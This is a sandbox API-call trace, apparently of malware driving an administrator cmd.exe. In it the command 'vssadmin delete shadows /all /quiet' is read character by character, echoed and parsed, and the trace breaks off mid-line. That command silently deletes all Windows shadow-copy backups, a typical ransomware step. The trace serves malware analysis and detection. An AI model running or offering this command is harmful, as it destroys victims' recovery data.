[0057.112] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.112] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.112] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.113] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0057.113] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.113] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.113] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.113] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0057.113] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.113] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.113] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.113] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e332, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0057.113] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.113] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.113] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.113] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e334, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0057.113] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.113] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.113] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.113] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e336, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0057.113] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.113] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.113] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.113] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e338, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0057.113] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.113] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.113] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.114] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e33a, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0057.114] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.114] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.114] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.114] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e33c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0057.114] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.114] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.114] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.114] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e33e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0057.114] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.114] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.114] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.114] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e340, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0057.114] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.114] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.114] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.114] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e342, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0057.114] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.114] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.114] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.114] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e344, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0057.114] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.114] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.114] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.114] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e346, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0057.114] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.114] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.115] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.115] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e348, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0057.115] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.115] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.115] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.115] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e34a, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0057.115] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.115] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.115] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.115] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e34c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0057.115] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.115] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.115] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.115] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0057.115] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.115] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.115] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.115] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0057.115] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.115] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.115] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.115] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0057.115] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.115] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.115] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.116] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0057.116] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.116] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.116] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.116] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0057.116] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.116] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.116] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.116] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0057.116] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.116] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.116] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.116] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0057.116] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.116] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.116] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.116] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0057.116] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.116] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.116] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.116] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0057.116] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.116] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.116] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.116] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0057.116] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.117] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.117] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.117] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0057.117] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.117] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.117] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.117] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0057.117] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.117] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.117] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.117] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0057.118] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.118] GetFileType (hFile=0xa4) returned 0x3 [0057.118] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.118] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.118] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.118] GetFileType (hFile=0x10c) returned 0x3 [0057.118] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.118] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0057.118] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x2cf538, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf538*=0x24, lpOverlapped=0x0) returned 1 [0057.118] GetProcessHeap () returned 0x3e0000 [0057.118] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4012) returned 0x3fcd20 [0057.118] GetProcessHeap () returned 0x3e0000 [0057.118] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcd20 | out: hHeap=0x3e0000) returned 1 [0057.119] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0057.119] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0057.119] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0057.119] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0057.119] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0057.119] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0057.119] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0057.119] GetProcessHeap () returned 0x3e0000 [0057.119] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0) returned 0x3f97e0 [0057.119] GetProcessHeap () returned 0x3e0000 [0057.119] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x22) returned 0x3f4610 [0057.120] GetProcessHeap () returned 0x3e0000 [0057.120] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x48) returned 0x3f98a0 [0057.120] GetConsoleOutputCP () returned 0x1b5 [0057.120] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f6bfe0 | out: lpCPInfo=0x49f6bfe0) returned 1 [0057.120] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0057.121] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4f0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0057.122] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0057.122] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0057.122] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0057.122] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0057.122] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0057.122] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0057.122] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0057.122] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0057.122] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0057.122] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0057.122] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0057.122] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0057.122] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0057.122] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0057.122] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0057.122] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0057.122] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0057.122] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0057.122] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0057.122] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0057.122] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0057.122] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0057.122] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0057.122] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0057.122] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0057.122] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0057.122] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0057.123] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0057.123] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0057.123] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0057.123] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0057.123] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0057.123] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0057.123] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0057.123] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0057.123] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0057.123] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0057.123] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0057.123] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0057.123] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0057.123] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0057.123] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0057.123] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0057.123] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0057.123] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0057.123] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0057.123] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0057.123] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0057.123] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0057.123] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0057.123] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0057.123] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0057.123] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0057.123] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0057.123] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0057.123] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0057.123] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0057.123] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0057.123] _wcsicmp 